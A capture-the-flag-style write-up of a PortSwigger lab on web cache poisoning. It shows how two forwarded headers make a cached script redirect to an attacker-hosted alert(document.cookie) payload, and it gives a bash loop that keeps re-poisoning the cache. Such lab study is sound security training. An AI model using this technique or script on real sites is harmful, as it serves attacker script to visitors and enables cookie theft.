PortSwigger Lab: Web cache poisoning with multiple headers

Jun Takemura · March 6, 2025

PortSwigger Lab: Web cache poisoning with multiple headers

Task

This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor’s browser.

Attempt

Adding the headers below to /resources/js/tracking.js and sent the request:

X-Forwarded-Host: example.com
X-Forwarded-Scheme: http

With this the response redirected to example.com, indicating the cache poisoning vulnerability.

At the exploit server, host the js file with the same name and the path as /resources/js/tracking.js and set the payload:

alert(document.cookie)

Set X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net so that it will redirect to the exploit server. When testing cache poisoning, add a cache buster like /resources/js/tracking.js?cp=dakfejlsjtesojad so it doesn’t affect the live website. The value of the parameter should be random so that it doesn’t get easily found by normal users.

To solve this lab, after confirming cache poisoning works, you need to cache poison the actual website by removing the cache buster.

Automatic cache re-poisoning

Sometimes some people say cache poisoning isn’t really critical because it only works for a short amount of time. But automatically re-poisoning the cache is easy as pie and you don’t need to send a huge amount of traffic.

#!/bin/bash

url="https://ID.web-security-academy.net/resources/js/tracking.js"
headers="-H 'X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net' -H 'X-Forwarded-Scheme: nothttps'"

while true; do
  curl -s $url $headers > /dev/null
  sleep 2
done

This simple bash script keeps re-poisoning the cache indefinitely.

Twitter, Facebook